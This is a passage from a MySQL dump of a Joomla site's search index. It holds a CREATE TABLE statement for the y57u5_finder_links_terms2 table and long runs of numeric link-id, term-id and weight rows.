(245, 284746, 0.79331),
(245, 284747, 0.91),
(246, 285337, 0.79331),
(246, 285338, 0.91),
(246, 285339, 0.81669),
(246, 285340, 0.86331),
(247, 286395, 0.79331),
(247, 286396, 0.98),
(247, 286397, 0.79331),
(247, 286398, 0.93331),
(248, 287333, 0.77),
(248, 287334, 1.07331),
(249, 288364, 2.09661),
(249, 288365, 2.38),
(251, 289408, 2.6666),
(255, 292618, 0.86331),
(305, 292618, 0.86331),
(255, 292619, 1.00331),
(258, 295175, 0.77),
(258, 295176, 0.93331),
(262, 297300, 0.93331),
(262, 297301, 1.00331),
(268, 301895, 0.79331),
(268, 301896, 0.86331),
(287, 312759, 0.91),
(287, 312760, 1.07331),
(287, 312761, 0.81669),
(287, 312762, 0.86331),
(292, 317346, 0.86331),
(292, 317347, 0.91),
(294, 318433, 0.81669),
(294, 318434, 0.88669),
(299, 320545, 0.79331),
(299, 320546, 0.88669),
(299, 320547, 0.14),
(299, 320548, 0.81669),
(299, 320549, 0.93331),
(299, 320550, 0.09331),
(299, 320551, 0.86331),
(299, 320552, 0.98),
(304, 324813, 0.93331),
(304, 324814, 1.07331),
(304, 324815, 0.74),
(304, 324816, 2.4666),
(304, 324817, 2.7334),
(305, 325840, 0.77),
(305, 325841, 0.88669),
(305, 325842, 1.00331),
(305, 325843, 2.4666),
(305, 325844, 2.7334),
(306, 326813, 0.74),
(306, 326814, 2.6),
(306, 326815, 2.8666),
(308, 328911, 0.74),
(308, 328912, 2.9334);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_links_terms2`
--

CREATE TABLE `y57u5_finder_links_terms2` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `term_id` int(10) UNSIGNED NOT NULL,
  `weight` float UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_links_terms2`
--

INSERT INTO `y57u5_finder_links_terms2` (`link_id`, `term_id`, `weight`) VALUES
(31, 207, 0.23331),
(160, 207, 0.23331),
(250, 207, 0.23331),
(251, 207, 0.23331),
(31, 208, 1.07331),
(160, 208, 1.07331),
(250, 208, 1.07331),
(251, 208, 1.07331),
(31, 209, 1.19),
(160, 209, 1.19),
(250, 209, 1.19),
(251, 209, 1.19),
(159, 210, 0.18669),
(168, 210, 0.18669),
(233, 210, 0.18669),
(247, 210, 0.18669),
(248, 210, 0.18669),
(249, 210, 0.18669),
(254, 210, 0.18669),
(259, 210, 0.18669),
(260, 210, 0.18669),
(262, 210, 0.18669),
(264, 210, 0.18669),
(267, 210, 0.18669),
(275, 210, 0.18669),
(287, 210, 0.18669),
(304, 210, 0.18669),
(31, 210, 0.37338),
(160, 210, 0.37338),
(246, 210, 0.37338),
(250, 210, 0.37338),
(251, 210, 0.37338),
(256, 210, 0.37338),
(257, 210, 0.37338),
(261, 210, 0.37338),
(270, 210, 0.37338),
(273, 210, 0.37338),
(274, 210, 0.37338),
(301, 210, 0.37338),
(236, 210, 0.56007),
(238, 210, 0.56007),
(241, 210, 0.56007),
(263, 210, 0.56007),
(272, 210, 0.56007),
(280, 210, 0.56007),
(193, 210, 0.74676),
(237, 210, 0.74676),
(244, 210, 0.74676),
(268, 210, 0.74676),
(292, 210, 0.74676),
(240, 210, 0.93345),
(269, 210, 0.93345),
(288, 210, 0.93345),
(305, 210, 0.93345),
(252, 210, 1.12014),
(174, 210, 1.68021),
(178, 210, 1.68021),
(242, 210, 1.68021),
(299, 210, 1.68021),
(239, 210, 1.8669),
(243, 210, 2.05359),
(306, 210, 3.92049),
(31, 211, 0.93331),
(160, 211, 0.93331),
(250, 211, 0.93331),
(251, 211, 0.93331),
(31, 212, 1.00331),
(160, 212, 1.00331),
(250, 212, 1.00331),
(251, 212, 1.00331),
(31, 213, 0.93331),
(159, 213, 0.93331),
(160, 213, 0.93331),
(250, 213, 0.93331),
(251, 213, 0.93331),
(31, 214, 1.19),
(159, 214, 1.19),
(160, 214, 1.19),
(250, 214, 1.19),
(251, 214, 1.19),
(31, 215, 0.18669),
(159, 215, 0.18669),
(160, 215, 0.18669),
(161, 215, 0.18669),
(241, 215, 0.18669),
(247, 215, 0.18669),
(250, 215, 0.18669),
(251, 215, 0.18669),
(261, 215, 0.18669),
(263, 215, 0.18669),
(239, 215, 0.37338),
(258, 215, 0.37338),
(292, 215, 0.37338),
(306, 215, 0.37338),
(31, 216, 0.93331),
(159, 216, 0.93331),
(160, 216, 0.93331),
(250, 216, 0.93331),
(251, 216, 0.93331),
(31, 217, 1.00331),
(159, 217, 1.00331),
(160, 217, 1.00331),
(250, 217, 1.00331),
(251, 217, 1.00331),
(31, 218, 0.28),
(160, 218, 0.28),
(250, 218, 0.28),
(251, 218, 0.28),
(31, 219, 0.93331),
(160, 219, 0.93331),
(250, 219, 0.93331),
(251, 219, 0.93331),
(31, 220, 1.19),
(160, 220, 1.19),
(250, 220, 1.19),
(251, 220, 1.19),
(31, 289, 0.23331),
(250, 289, 0.23331),
(251, 289, 0.23331),
(31, 290, 0.91),
(250, 290, 0.91),
(251, 290, 0.91),
(31, 291, 1.05),
(250, 291, 1.05),
(251, 291, 1.05),
(174, 292, 0.23331),
(253, 292, 0.23331),
(292, 292, 0.23331),
(31, 292, 0.46662),
(159, 292, 0.46662),
(160, 292, 0.46662),
(250, 292, 0.46662),
(251, 292, 0.46662),
(31, 293, 0.98),
(159, 293, 0.98),
(160, 293, 0.98),
(250, 293, 0.98),
(251, 293, 0.98),
(31, 294, 1.05),
(159, 294, 1.05),
(160, 294, 1.05),
(250, 294, 1.05),
(251, 294, 1.05),
(31, 295, 0.95669),
(159, 295, 0.95669),
(160, 295, 0.95669),
(250, 295, 0.95669),
(251, 295, 0.95669),
(31, 296, 1.09669),
(159, 296, 1.09669),
(160, 296, 1.09669),
(250, 296, 1.09669),
(251, 296, 1.09669),
(31, 297, 0.14),
(159, 297, 0.14),
(160, 297, 0.14),
(178, 297, 0.14),
(233, 297, 0.14),
(235, 297, 0.14),
(242, 297, 0.14),
(243, 297, 0.14),
(244, 297, 0.14),
(247, 297, 0.14),
(250, 297, 0.14),
(251, 297, 0.14),
(253, 297, 0.14),
(255, 297, 0.14),
(257, 297, 0.14),
(258, 297, 0.14),
(273, 297, 0.14),
(275, 297, 0.14),
(288, 297, 0.14),
(292, 297, 0.14),
(298, 297, 0.14),
(299, 297, 0.14),
(304, 297, 0.14),
(308, 297, 0.14),
(254, 297, 0.28),
(268, 297, 0.28),
(305, 297, 0.28),
(240, 297, 0.42),
(259, 297, 0.56),
(260, 297, 0.56),
(267, 297, 0.56),
(256, 297, 0.98),
(265, 297, 0.98),
(266, 297, 0.98),
(193, 297, 1.12),
(31, 298, 0.86331),
(159, 298, 0.86331),
(160, 298, 0.86331),
(193, 298, 0.86331),
(250, 298, 0.86331),
(251, 298, 0.86331),
(256, 298, 0.86331),
(259, 298, 0.86331),
(260, 298, 0.86331),
(267, 298, 0.86331),
(288, 298, 0.86331),
(292, 298, 0.86331),
(305, 298, 0.86331),
(31, 299, 1.00331),
(159, 299, 1.00331),
(160, 299, 1.00331),
(250, 299, 1.00331),
(251, 299, 1.00331),
(168, 300, 0.18669),
(178, 300, 0.18669),
(233, 300, 0.18669),
(236, 300, 0.18669),
(239, 300, 0.18669),
(247, 300, 0.18669),
(264, 300, 0.18669),
(31, 300, 0.37338),
(245, 300, 0.37338),
(246, 300, 0.37338),
(250, 300, 0.37338),
(251, 300, 0.37338),
(267, 300, 0.37338),
(268, 300, 0.37338),
(273, 300, 0.37338),
(160, 300, 0.56007),
(238, 300, 0.56007),
(240, 300, 0.56007),
(241, 300, 0.56007),
(261, 300, 0.56007),
(269, 300, 0.56007),
(288, 300, 0.56007),
(193, 300, 0.74676),
(237, 300, 0.74676),
(248, 300, 0.74676),
(265, 300, 0.74676),
(266, 300, 0.74676),
(275, 300, 0.74676),
(299, 300, 0.74676),
(243, 300, 0.93345),
(254, 300, 0.93345),
(256, 300, 0.93345),
(257, 300, 0.93345),
(263, 300, 0.93345),
(304, 300, 0.93345),
(305, 300, 0.93345),
(258, 300, 1.12014),
(274, 300, 1.12014),
(259, 300, 1.49352),
(260, 300, 1.49352),
(270, 300, 1.49352),
(272, 300, 1.49352),
(280, 300, 1.49352),
(301, 300, 1.49352),
(174, 300, 1.68021),
(242, 300, 1.68021),
(159, 300, 2.08026),
(262, 300, 2.42697),
(306, 300, 2.64033),
(31, 301, 0.95669),
(159, 301, 0.95669),
(160, 301, 0.95669),
(248, 301, 0.95669),
(250, 301, 0.95669),
(251, 301, 0.95669),
(31, 302, 1.02669),
(159, 302, 1.02669),
(160, 302, 1.02669),
(250, 302, 1.02669),
(251, 302, 1.02669),
(31, 303, 0.93331),
(159, 303, 0.93331),
(160, 303, 0.93331),
(250, 303, 0.93331),
(251, 303, 0.93331),
(31, 304, 1.00331),
(159, 304, 1.00331),
(160, 304, 1.00331),
(250, 304, 1.00331),
(251, 304, 1.00331),
(31, 305, 0.18669),
(159, 305, 0.18669),
(160, 305, 0.18669),
(174, 305, 0.18669),
(178, 305, 0.18669),
(193, 305, 0.18669),
(236, 305, 0.18669),
(241, 305, 0.18669),
(243, 305, 0.18669),
(244, 305, 0.18669),
(246, 305, 0.18669),
(250, 305, 0.18669),
(251, 305, 0.18669),
(253, 305, 0.18669),
(257, 305, 0.18669),
(262, 305, 0.18669),
(265, 305, 0.18669),
(266, 305, 0.18669),
(270, 305, 0.18669),
(272, 305, 0.18669),
(280, 305, 0.18669),
(292, 305, 0.18669),
(301, 305, 0.18669),
(239, 305, 0.37338),
(256, 305, 0.37338),
(274, 305, 0.37338),
(305, 305, 0.37338),
(240, 305, 0.93345),
(242, 305, 2.61366),
(31, 306, 1.02669),
(159, 306, 1.02669),
(160, 306, 1.02669),
(250, 306, 1.02669),
(251, 306, 1.02669),
(31, 307, 1.19),
(159, 307, 1.19),
(160, 307, 1.19),
(250, 307, 1.19),
(251, 307, 1.19),
(31, 308, 0.18669),
(159, 308, 0.18669),
(160, 308, 0.18669),
(240, 308, 0.18669),
(242, 308, 0.18669),
(248, 308, 0.18669),
(250, 308, 0.18669),
(258, 308, 0.18669),
(262, 308, 0.18669),
(263, 308, 0.18669),
(306, 308, 0.18669),
(270, 308, 0.37338),
(301, 308, 0.37338),
(235, 308, 0.93345),
(251, 308, 3.22707),
(31, 309, 0.86331),
(159, 309, 0.86331),
(160, 309, 0.86331),
(250, 309, 0.86331),
(251, 309, 0.86331),
(31, 310, 0.98),
(159, 310, 0.98),
(160, 310, 0.98),
(250, 310, 0.98),
(251, 310, 0.98),
(31, 311, 0.28),
(159, 311, 0.28),
(160, 311, 0.28),
(240, 311, 0.28),
(250, 311, 0.28),
(251, 311, 0.28),
(267, 311, 0.28),
(273, 311, 0.28),
(235, 311, 0.56),
(243, 311, 0.56),
(264, 311, 0.56),
(270, 311, 0.84),
(301, 311, 0.84),
(306, 311, 2.28),
(31, 312, 0.93331),
(159, 312, 0.93331),
(160, 312, 0.93331),
(250, 312, 0.93331),
(251, 312, 0.93331),
(306, 312, 7.59981),
(31, 313, 1.07331),
(159, 313, 1.07331),
(160, 313, 1.07331),
(250, 313, 1.07331),
(251, 313, 1.07331),
(31, 314, 0.28),
(159, 314, 0.28),
(160, 314, 0.28),
(250, 314, 0.28),
(251, 314, 0.28),
(31, 315, 0.93331),
(159, 315, 0.93331),
(160, 315, 0.93331),
(250, 315, 0.93331),
(251, 315, 0.93331),
(31, 316, 1.05),
(159, 316, 1.05),
(160, 316, 1.05),
(250, 316, 1.05),
(251, 316, 1.05),
(159, 1081, 0.95669),
(160, 1081, 0.95669),
(257, 1081, 0.95669),
(159, 1082, 1.16669),
(160, 1082, 1.16669),
(161, 1519, 0.23331),
(178, 1519, 0.23331),
(242, 1519, 0.23331),
(244, 1519, 0.23331),
(267, 1519, 0.46662),
(241, 1519, 1.16655),
(161, 1525, 0.37331),
(174, 1525, 0.37331),
(253, 1525, 0.37331),
(178, 2232, 0.23331),
(193, 2232, 0.23331),
(238, 2232, 0.23331),
(240, 2232, 0.23331),
(243, 2232, 0.23331),
(244, 2232, 0.23331),
(298, 2232, 0.23331),
(308, 2232, 0.23331),
(250, 2232, 0.39996),
(251, 2232, 0.39996),
(252, 2232, 0.39996),
(237, 2232, 0.56661),
(253, 2232, 0.63327),
(299, 2232, 0.93324),
(288, 2232, 0.96657),
(241, 2232, 1.89981),
(254, 2232, 1.89981),
(256, 2232, 2.29977),
(257, 2232, 2.29977),
(258, 2232, 2.29977),
(259, 2232, 2.29977),
(260, 2232, 2.29977),
(261, 2232, 2.29977),
(262, 2232, 2.29977),
(264, 2232, 2.29977),
(267, 2232, 2.29977),
(268, 2232, 2.29977),
(269, 2232, 2.29977),
(270, 2232, 2.29977),
(273, 2232, 2.29977),
(274, 2232, 2.29977),
(275, 2232, 2.29977),
(301, 2232, 2.29977),
(304, 2232, 2.29977),
(305, 2232, 2.29977),
(263, 2232, 2.53308),
(265, 2232, 2.53308),
(266, 2232, 2.53308),
(272, 2232, 2.53308),
(280, 2232, 2.53308),
(292, 2232, 2.53308),
(290, 2232, 2.76639),
(255, 2232, 3.23301),
(178, 12873, 0.14),
(193, 12873, 0.14),
(233, 12873, 0.14),
(237, 12873, 0.14),
(238, 12873, 0.14),
(241, 12873, 0.14),
(244, 12873, 0.14),
(249, 12873, 0.14),
(258, 12873, 0.14),
(263, 12873, 0.14),
(267, 12873, 0.14),
(272, 12873, 0.14),
(280, 12873, 0.14),
(288, 12873, 0.14),
(304, 12873, 0.14),
(168, 12873, 0.28),
(174, 12873, 0.28),
(235, 12873, 0.28),
(240, 12873, 0.28),
(252, 12873, 0.28),
(253, 12873, 0.28),
(257, 12873, 0.28),
(259, 12873, 0.28),
(260, 12873, 0.28),
(264, 12873, 0.28),
(268, 12873, 0.28),
(270, 12873, 0.28),
(290, 12873, 0.28),
(301, 12873, 0.28),
(306, 12873, 0.28),
(239, 12873, 0.42),
(242, 12873, 0.42),
(243, 12873, 0.42),
(256, 12873, 0.42),
(269, 12873, 0.42),
(274, 12873, 0.42),
(246, 12873, 0.56),
(254, 12873, 0.56),
(255, 12873, 0.7),
(262, 12873, 0.7),
(265, 12873, 0.7),
(266, 12873, 0.7),
(292, 12873, 0.7),
(174, 12874, 0.93331),
(252, 12874, 0.93331),
(270, 12874, 0.93331),
(292, 12874, 0.93331),
(301, 12874, 0.93331),
(252, 12876, 0.98),
(265, 12876, 0.98),
(266, 12876, 0.98),
(252, 12877, 1.07331),
(265, 12877, 1.07331),
(266, 12877, 1.07331),
(193, 12878, 0.91),
(252, 12878, 0.91),
(178, 12880, 0.95669),
(252, 12880, 0.95669),
(252, 12888, 0.88669),
(268, 12888, 1.77338),
(299, 12888, 1.77338),
(193, 12890, 0.28),
(235, 12890, 0.28),
(236, 12890, 0.28),
(242, 12890, 0.28),
(244, 12890, 0.28),
(245, 12890, 0.28),
(257, 12890, 0.28),
(252, 12890, 0.56),
(193, 12893, 0.09331),
(233, 12893, 0.09331),
(240, 12893, 0.09331),
(241, 12893, 0.09331),
(255, 12893, 0.09331),
(256, 12893, 0.09331),
(263, 12893, 0.09331),
(264, 12893, 0.09331),
(269, 12893, 0.09331),
(270, 12893, 0.09331),
(275, 12893, 0.09331),
(301, 12893, 0.09331),
(239, 12893, 0.18662),
(245, 12893, 0.18662),
(252, 12893, 0.18662),
(267, 12893, 0.18662),
(273, 12893, 0.18662),
(242, 12893, 0.27993),
(257, 12893, 0.27993),
(299, 12893, 0.27993),
(304, 12893, 0.27993),
(305, 12893, 0.27993),
(174, 12893, 0.37324),
(253, 12893, 0.37324),
(258, 12893, 0.37324),
(265, 12893, 0.37324),
(266, 12893, 0.37324),
(272, 12893, 0.37324),
(280, 12893, 0.37324),
(178, 12893, 0.46655),
(237, 12893, 0.46655),
(254, 12893, 0.46655),
(288, 12893, 0.46655),
(243, 12893, 0.55986),
(247, 12893, 0.55986),
(248, 12893, 0.55986),
(262, 12893, 0.55986),
(274, 12893, 0.65317),
(235, 12893, 0.74648),
(290, 12893, 0.74648),
(249, 12893, 0.83979),
(261, 12893, 0.83979),
(292, 12893, 0.83979),
(238, 12893, 0.9331),
(244, 12893, 0.9331),
(306, 12893, 0.9331),
(168, 12893, 1.02641),
(239, 12898, 0.14),
(243, 12898, 0.14),
(249, 12898, 0.14),
(252, 12898, 0.14),
(255, 12898, 0.14),
(257, 12898, 0.14),
(259, 12898, 0.14),
(260, 12898, 0.14),
(261, 12898, 0.14),
(264, 12898, 0.14),
(273, 12898, 0.14),
(292, 12898, 0.14),
(178, 12898, 0.28),
(240, 12898, 0.28),
(247, 12898, 0.28),
(253, 12898, 0.28),
(258, 12898, 0.28),
(262, 12898, 0.28),
(274, 12898, 0.28),
(288, 12898, 0.28),
(304, 12898, 0.28),
(236, 12898, 0.42),
(263, 12898, 0.42),
(265, 12898, 0.42),
(266, 12898, 0.42),
(299, 12898, 0.42),
(306, 12898, 0.42),
(235, 12898, 0.56),
(267, 12898, 0.56),
(242, 12898, 0.98),
(290, 12898, 1.12),
(233, 12898, 1.4),
(244, 12898, 1.82),
(305, 12898, 2.24),
(168, 12898, 4.06),
(193, 12901, 0.14),
(241, 12901, 0.14),
(245, 12901, 0.14),
(252, 12901, 0.14),
(256, 12901, 0.14),
(264, 12901, 0.14),
(268, 12901, 0.14),
(273, 12901, 0.14),
(298, 12901, 0.14),
(304, 12901, 0.14),
(308, 12901, 0.14),
(233, 12901, 0.28),
(236, 12901, 0.28),
(237, 12901, 0.28),
(246, 12901, 0.28),
(255, 12901, 0.28),
(261, 12901, 0.28),
(262, 12901, 0.28),
(263, 12901, 0.28),
(267, 12901, 0.28),
(272, 12901, 0.28),
(280, 12901, 0.28),
(288, 12901, 0.28),
(299, 12901, 0.28),
(305, 12901, 0.28),
(235, 12901, 0.42),
(243, 12901, 0.42),
(247, 12901, 0.42),
(249, 12901, 0.42),
(265, 12901, 0.42),
(266, 12901, 0.42),
(292, 12901, 0.42),
(174, 12901, 0.56),
(248, 12901, 0.56),
(269, 12901, 0.56),
(306, 12901, 0.56),
(178, 12901, 0.7),
(240, 12901, 0.7),
(257, 12901, 0.7),
(258, 12901, 0.7),
(290, 12901, 0.7),
(239, 12901, 0.84),
(242, 12901, 0.84),
(274, 12901, 0.84),
(238, 12901, 0.98),
(275, 12901, 0.98),
(244, 12901, 1.12),
(253, 12901, 1.12),
(168, 12901, 1.26),
(193, 12902, 0.93331),
(252, 12902, 0.93331),
(275, 12902, 0.93331),
(292, 12902, 0.93331),
(240, 12993, 0.28),
(252, 12993, 0.28),
(248, 12996, 0.23331),
(252, 12996, 0.23331),
(258, 12996, 0.23331),
(269, 12996, 0.23331),
(273, 12996, 0.23331),
(274, 12996, 0.23331),
(275, 12996, 0.23331),
(304, 12996, 0.23331),
(243, 12996, 0.46662),
(262, 12996, 0.46662),
(263, 12996, 0.46662),
(270, 12996, 0.46662),
(301, 12996, 0.46662),
(174, 12996, 0.93324),
(239, 12999, 0.18669),
(241, 12999, 0.18669),
(256, 12999, 0.18669),
(240, 12999, 0.56007),
(252, 12999, 0.56007),
(257, 12999, 0.56007),
(233, 13009, 0.18669),
(237, 13009, 0.18669),
(242, 13009, 0.18669),
(246, 13009, 0.18669),
(252, 13009, 0.18669),
(254, 13009, 0.18669),
(255, 13009, 0.18669),
(259, 13009, 0.18669),
(260, 13009, 0.18669),
(263, 13009, 0.18669),
(264, 13009, 0.18669),
(265, 13009, 0.18669),
(266, 13009, 0.18669),
(275, 13009, 0.18669),
(295, 13009, 0.18669),
(298, 13009, 0.18669),
(304, 13009, 0.18669),
(306, 13009, 0.18669),
(308, 13009, 0.18669),
(241, 13009, 0.37338),
(244, 13009, 0.37338),
(249, 13009, 0.37338),
(253, 13009, 0.37338),
(256, 13009, 0.37338),
(305, 13009, 0.37338),
(174, 13009, 0.56007),
(235, 13009, 0.56007),
(236, 13009, 0.56007),
(238, 13009, 0.56007),
(243, 13009, 0.56007),
(247, 13009, 0.56007),
(257, 13009, 0.56007),
(288, 13009, 0.56007),
(267, 13009, 0.74676),
(178, 13009, 0.93345),
(193, 13009, 0.93345),
(290, 13009, 0.93345),
(292, 13009, 0.93345),
(299, 13009, 1.12014),
(168, 13009, 1.30683),
(258, 13009, 2.80035),
(168, 16311, 0.86331),
(233, 16311, 0.86331),
(242, 16311, 0.86331),
(263, 16311, 0.86331),
(292, 16311, 0.86331),
(299, 16327, 0.0175),
(178, 16327, 0.14),
(235, 16327, 0.14),
(236, 16327, 0.14),
(238, 16327, 0.14),
(241, 16327, 0.14),
(244, 16327, 0.14),
(247, 16327, 0.14),
(262, 16327, 0.14),
(263, 16327, 0.14),
(264, 16327, 0.14),
(265, 16327, 0.14),
(266, 16327, 0.14),
(267, 16327, 0.14),
(269, 16327, 0.14),
(290, 16327, 0.14),
(246, 16327, 0.28),
(259, 16327, 0.28),
(260, 16327, 0.28),
(174, 16327, 0.42),
(258, 16327, 0.42),
(292, 16327, 0.42),
(193, 16327, 0.48),
(243, 16327, 0.56),
(257, 16327, 0.56),
(261, 16327, 0.56),
(242, 16327, 0.9),
(306, 16327, 0.98),
(239, 16327, 1.04),
(240, 16327, 1.04),
(233, 16327, 1.14),
(168, 21043, 0.23331),
(174, 21043, 0.23331),
(178, 21043, 0.23331),
(239, 21043, 0.23331),
(257, 21043, 0.23331),
(233, 21043, 0.46662),
(256, 21043, 0.46662),
(233, 21046, 0.88669),
(239, 21046, 0.88669),
(233, 21050, 0.86331),
(237, 21050, 0.86331),
(246, 21050, 0.86331),
(264, 21050, 0.86331),
(269, 21050, 0.86331),
(242, 21050, 1.72662),
(306, 21050, 3.45324),
(233, 21054, 0.81669),
(265, 21054, 0.81669),
(266, 21054, 0.81669),
(290, 21054, 0.81669),
(168, 21054, 1.63338),
(233, 21056, 0.86331),
(236, 21056, 0.86331),
(290, 21056, 0.86331),
(242, 21056, 1.72662),
(233, 21062, 0.84),
(259, 21062, 0.84),
(260, 21062, 0.84),
(267, 21062, 0.84),
(262, 21062, 1.68),
(233, 21063, 0.93331),
(259, 21063, 0.93331),
(260, 21063, 0.93331),
(168, 21066, 0.84),
(233, 21066, 1.68),
(244, 21066, 2.52),
(168, 21070, 0.88669),
(233, 21070, 0.88669),
(168, 21074, 0.91),
(174, 21074, 0.91),
(233, 21074, 0.91),
(257, 21074, 0.91),
(178, 21076, 0.18669),
(193, 21076, 0.18669),
(242, 21076, 0.18669),
(243, 21076, 0.18669),
(244, 21076, 0.18669),
(248, 21076, 0.18669),
(255, 21076, 0.18669),
(257, 21076, 0.18669),
(258, 21076, 0.18669),
(259, 21076, 0.18669),
(260, 21076, 0.18669),
(264, 21076, 0.18669),
(269, 21076, 0.18669),
(235, 21076, 0.37338),
(298, 21076, 0.37338),
(308, 21076, 0.37338),
(239, 21076, 0.56007),
(262, 21076, 0.56007),
(267, 21076, 0.74676),
(268, 21076, 1.12014),
(304, 21076, 1.68021),
(233, 21076, 3.2004),
(305, 21076, 4.10718),
(239, 21077, 0.93331),
(262, 21077, 0.93331),
(267, 21077, 0.93331),
(304, 21077, 0.93331),
(268, 21077, 1.86662),
(305, 21077, 1.86662),
(233, 21077, 15.9996),
(239, 21078, 1.12),
(233, 21078, 14.72),
(238, 21083, 0.84),
(257, 21083, 0.84),
(259, 21083, 0.84),
(260, 21083, 0.84),
(263, 21083, 0.84),
(258, 21083, 1.68),
(306, 21083, 1.68),
(193, 21083, 2.04),
(242, 21083, 2.04),
(240, 21083, 4.56),
(239, 21083, 5.4),
(233, 21083, 6.84),
(174, 21119, 0.28),
(233, 21119, 0.28),
(240, 21119, 0.28),
(242, 21119, 0.28),
(233, 21127, 0.86331),
(244, 21127, 0.86331),
(253, 21127, 0.86331),
(265, 21127, 0.86331),
(266, 21127, 0.86331),
(304, 21127, 0.86331),
(305, 21127, 0.86331),
(299, 23407, 0.28),
(259, 23407, 3.08),
(260, 23407, 3.08),
(299, 23413, 0.18669),
(244, 23413, 0.37338),
(178, 23413, 0.56007),
(174, 23416, 0.84),
(193, 23416, 0.84),
(236, 23416, 0.84),
(242, 23416, 0.84),
(247, 23416, 0.84),
(261, 23416, 0.84),
(262, 23416, 0.84),
(270, 23416, 0.84),
(287, 23416, 0.84),
(301, 23416, 0.84),
(237, 23416, 1.68),
(299, 23416, 1.68),
(305, 23416, 1.68),
(239, 23416, 3.36),
(242, 23418, 0.93331),
(299, 23418, 0.93331),
(244, 23419, 0.91),
(299, 23419, 0.91),
(306, 23419, 1.82),
(168, 23430, 0.86331),
(299, 23430, 0.86331),
(238, 23432, 0.81669),
(254, 23432, 0.81669),
(255, 23432, 0.81669),
(257, 23432, 0.81669),
(261, 23432, 0.81669),
(262, 23432, 0.81669),
(264, 23432, 0.81669),
(299, 23432, 0.81669),
(304, 23432, 0.81669),
(305, 23432, 0.81669),
(306, 23432, 0.81669),
(248, 23432, 1.63338),
(235, 23432, 2.45007),
(244, 23432, 2.45007),
(262, 23433, 0.86331),
(299, 23433, 0.86331),
(305, 23433, 0.86331),
(240, 23436, 0.18669),
(299, 23436, 0.18669),
(257, 23436, 0.37338),
(269, 23436, 0.37338),
(235, 23436, 0.56007),
(255, 23439, 0.91),
(299, 23439, 0.91),
(290, 23439, 1.82),
(254, 23445, 0.93331),
(299, 23445, 0.93331),
(193, 23447, 0.28),
(256, 23447, 0.28),
(299, 23447, 0.28),
(178, 23455, 0.32669),
(242, 23455, 0.32669),
(246, 23455, 0.32669),
(257, 23455, 0.32669),
(263, 23455, 0.32669),
(292, 23455, 0.32669),
(299, 23455, 0.32669),
(235, 23455, 0.65338),
(238, 23455, 0.65338),
(235, 23456, 0.91),
(299, 23456, 0.91),
(236, 23466, 0.32669),
(243, 23466, 0.32669),
(299, 23466, 0.32669),
(257, 23469, 0.86331),
(299, 23469, 0.86331),
(168, 23471, 0.23331),
(237, 23471, 0.23331),
(248, 23471, 0.23331),
(262, 23471, 0.23331),
(268, 23471, 0.23331),
(292, 23471, 0.23331),
(299, 23471, 0.23331),
(306, 23471, 0.23331),
(240, 23471, 0.46662),
(267, 23471, 0.46662),
(168, 23472, 0.95669),
(237, 23472, 0.95669),
(240, 23472, 0.95669),
(262, 23472, 0.95669),
(292, 23472, 0.95669),
(299, 23472, 0.95669),
(237, 23473, 1.05),
(178, 23610, 0.18669),
(299, 23610, 0.18669),
(240, 23616, 0.84),
(243, 23616, 0.84),
(255, 23616, 0.84),
(299, 23616, 0.84),
(239, 23618, 0.23331),
(248, 23618, 0.23331),
(299, 23618, 0.23331),
(174, 23621, 0.88669),
(240, 23621, 0.88669),
(242, 23621, 0.88669),
(248, 23621, 0.88669),
(258, 23621, 0.88669),
(263, 23621, 0.88669),
(267, 23621, 0.88669),
(269, 23621, 0.88669),
(270, 23621, 0.88669),
(274, 23621, 0.88669),
(288, 23621, 0.88669),
(299, 23621, 0.88669),
(301, 23621, 0.88669),
(306, 23621, 0.88669),
(238, 23621, 1.77338),
(272, 23621, 1.77338),
(280, 23621, 1.77338),
(259, 23621, 2.66007),
(260, 23621, 2.66007),
(275, 23621, 2.66007),
(254, 23625, 0.88669),
(257, 23625, 0.88669),
(299, 23625, 0.88669),
(306, 23625, 0.88669),
(262, 23625, 1.77338),
(288, 23625, 1.77338),
(236, 23629, 0.18669),
(299, 23629, 0.18669),
(178, 23636, 0.88669),
(193, 23636, 0.88669),
(246, 23636, 0.88669),
(253, 23636, 0.88669),
(257, 23636, 0.88669),
(258, 23636, 0.88669),
(288, 23636, 0.88669),
(299, 23636, 1.77338),
(246, 23637, 1.07331),
(299, 23637, 2.14662),
(242, 23640, 0.93331),
(253, 23640, 0.93331),
(299, 23640, 0.93331),
(174, 23642, 0.14),
(239, 23642, 0.14),
(240, 23642, 0.14),
(256, 23642, 0.14),
(262, 23642, 0.14),
(263, 23642, 0.14),
(265, 23642, 0.14),
(266, 23642, 0.14),
(268, 23642, 0.14),
(274, 23642, 0.14),
(299, 23642, 0.14),
(242, 23642, 0.28),
(239, 23643, 0.84),
(240, 23643, 0.84),
(262, 23643, 0.84),
(263, 23643, 0.84),
(274, 23643, 0.84),
(299, 23643, 0.84),
(242, 23643, 1.68),
(178, 23645, 0.28),
(299, 23645, 0.28),
(249, 25124, 0.88669),
(298, 25124, 0.88669),
(308, 25124, 0.88669),
(178, 25126, 0.95669),
(193, 25126, 0.95669),
(248, 25126, 0.95669),
(255, 25126, 0.95669),
(257, 25126, 0.95669),
(258, 25126, 0.95669),
(259, 25126, 0.95669),
(260, 25126, 0.95669),
(264, 25126, 0.95669),
(239, 25126, 1.91338),
(298, 25126, 1.91338),
(308, 25126, 1.91338),
(267, 25126, 2.87007),
(268, 25126, 3.82676),
(304, 25126, 7.65352),
(305, 25126, 19.1338),
(193, 25179, 0.23331),
(235, 25179, 0.23331),
(247, 25179, 0.23331),
(255, 25179, 0.23331),
(258, 25179, 0.23331),
(264, 25179, 0.23331),
(304, 25179, 0.23331),
(306, 25179, 0.23331),
(308, 25179, 0.23331),
(240, 25179, 0.46662),
(298, 25179, 0.46662),
(193, 25180, 0.88669),
(240, 25180, 0.88669),
(247, 25180, 0.88669),
(255, 25180, 0.88669),
(304, 25180, 0.88669),
(308, 25180, 0.88669),
(298, 25180, 1.77338),
(256, 25185, 0.88669),
(257, 25185, 0.88669),
(258, 25185, 0.88669),
(267, 25185, 0.88669),
(298, 25185, 0.88669),
(308, 25185, 0.88669),
(193, 25185, 1.77338),
(254, 25185, 1.77338),
(259, 25185, 1.77338),
(260, 25185, 1.77338),
(265, 25185, 4.43345),
(266, 25185, 4.43345),
(255, 25187, 0.28),
(258, 25187, 0.28),
(259, 25187, 0.28),
(260, 25187, 0.28),
(298, 25187, 0.28),
(304, 25187, 0.28),
